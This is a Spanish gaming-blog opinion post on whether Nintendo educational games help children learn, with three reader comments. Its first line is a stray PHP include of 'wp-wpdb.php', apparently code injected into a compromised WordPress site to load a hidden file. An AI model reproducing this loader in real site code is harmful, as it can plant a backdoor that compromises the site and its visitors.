if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Complementa la educación de los niños con los videojuegos – La Fortaleza de LeChuck

Complementa la educación de los niños con los videojuegos

Nintendo apuesta por la educación a través de Wii y Dsi, o al menos eso intentan con el lanzamiento de The Very Hungry Cartepillar’s ABCs, disponible desde ya en la tienda virtual de Wii, y Éxito en primaria Matemáticas Curso 2º, disponible en la tienda de Dsi y en la eShop. Y todo por unos 800 y 500 puntos Nintendo respectivamente. ¿Pero nos encontramos realmente ante algo útil de verdad?, ¿o simplemente estamos ante otro intento inútil de que se vean las consolas como positivas frente a los estudios?

Pedagogos y Psicólogos coincidimos en que el aprendizaje es mucho más efectivo si el niño o el alumno aprende de una forma lúdica, mediante el juego, pero esto puede ser un arma de doble filo. Por un lado puede motivar a los niños y niñas para que se vuelquen totalmente en el aprendizaje, pero puede existir una “sobremotivación” que lleve a que simplemente se utilicen estos métodos por el hecho de tener la consola y poder utilizarla. Esto último nos puede llevar a un “desaprendizaje” que no es nada beneficioso para los niños, ya que pierden atención mientras hacen los ejercicios o mientras estudian sin la consola pensando solamente en el momento en que van a utilizarlas. 
No obstante, y bajo la supervisión y el apoyo de los padres, este tipo de prácticas educativas pueden resultar más beneficiosas que perjudiciales, ya que tenemos que tener siempre presente que esta metodología es un apoyo y un refuerzo más y NUNCA un sustituto al aprendizaje de la escuela. 

En el caso de Wii, tenemos a The Very Hungry Cartepillar’s ABCs que utiliza tarjetas para ayudar a los más pequeños a aprenderse el abecedario asociando palabras y dibujos que los niños conocen con cada letra, algo que se puede relacionar con la teoría pedagógica de Paulo Freire, además este juego está basado en el libro infantil The Very Hungry Cartepillar. Para jugar, los niños y niñas tendrán que dirigir a una oruga para que resuelvan sencillos rompecabezas y ejercicios de dibujo fáciles y coloridos. Este costará alrededor de 800 puntos Nintendo.
La oruga de The Very Hungry Cartepillar

En el caso Nintendo 3DS y Nintendo DSi tenemos a Éxito en primaria Matemáticas Curso 2º, disponible para DSiWare. Este juego consiste en completar una serie de ejercicios que ayudarán a los niños y niñas a mejorar en matemáticas de una manera divertida. Como acompañante de aventuras tendremos a Freddy, un pequeño vampiro que irá motivando a los niños y nos dará útiles pistas y consejos. Se trata de la tercera entrega del juego de Tivola y está disponible para DSiWare por 500 puntos Nintendo en la Tienda DSi y por 5 euros en la Nintendo eShop de Nintendo 3DS.
Freddy, nuestro vampírico amigo
 Pero no creáis que esto es algo totalmente innovador, pues ya Afterzoom recibió el Premio al mejor videojuego europeo para la educación, ya que conseguía enseñar a niños de siete años a recitar sin titubear la tabla periódica y algunas fórmulas químicas, todo un éxito. Para jugar a Afterzoom la cámara de tu Nintendo DSi se convierte en un microscopio capaz de visualizar las partículas más pequeñas de los objetos que tienes a tu alrededor. En el juego adoptamos el papel de científico, capturando a los pequeños seres que vemos y los almacenamos en el banco de muestras de nuestro laboratorio. Una vez hayamos cogido las primeras muestras, debemos tenerlas bien alimentadas. ¿Pero qué se le da de comer a criaturas prácticamente invisibles? Lógicamente, partículas todavía más pequeñas que ellas. ¿Qué tal si les das de comer los elementos de la tabla periódica? Vete al laboratorio de Afterzoom, cocina los elementos y obtén la fórmula química adecuada para cada microorganismo.

De esta forma se consigue que los alumnos obtengan un significado de aquello que van a aprender, teoría que sin lugar a dudas hace referencia a uno de los mayores Pedagogos de la historia, David Ausubel.

Los que pertenezcáis a la Comunidad de LFDL sabréis que mi GT en Xbox es Ausubel, así que ya sabéis de donde viene.
Afortunadamente algunos colegios españoles, que se preocupan porque la Pedagogía sea eje de sus centros educativos, han utilizado este tipo de dinámicas. Un ejemplo de estos colegios es El Colegio Los Olmos, situado en la ciudad de Madrid.
¿Qué opináis los lechukeros al respecto?, ¿pensáis que sirven realmente de apoyo o son una pérdida de tiempo?
Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

7 comentarios

    1. Un día estaba pequeñaja jugando a la PSP… le pregunté a que estaba jugando, la respuesta fue esta, tal cual: A uno que mato a putas, para robarles el dinero…" GTA San Andreas… Y la madre al lado macho…Así las cosas nunca funcionarán…

  1. ¿Y qué, si luego salen los que dicen que "PEGI es censura" y "dejad a los niños ser libres" y "yo jugué a Mortal Kombat cuando chaval y no soy violento"? Nos quedamos en lo mismo.

  2. yo creo que estos juegos son de gran utilidad , siempre y cuando sea un complemento a este aprendizaje , un extra mas divertido para aprender . Aun asi creo que no es necesario un juego de este tipo para aprender con los videojeugos , hay muxos juegos de caracter no educativo que enseñan muxo , hay muxos juegos que enseñan valores que estos de abc etc no enseñan : esfrozarse , compañerismo etc.0.

Dejar un comentario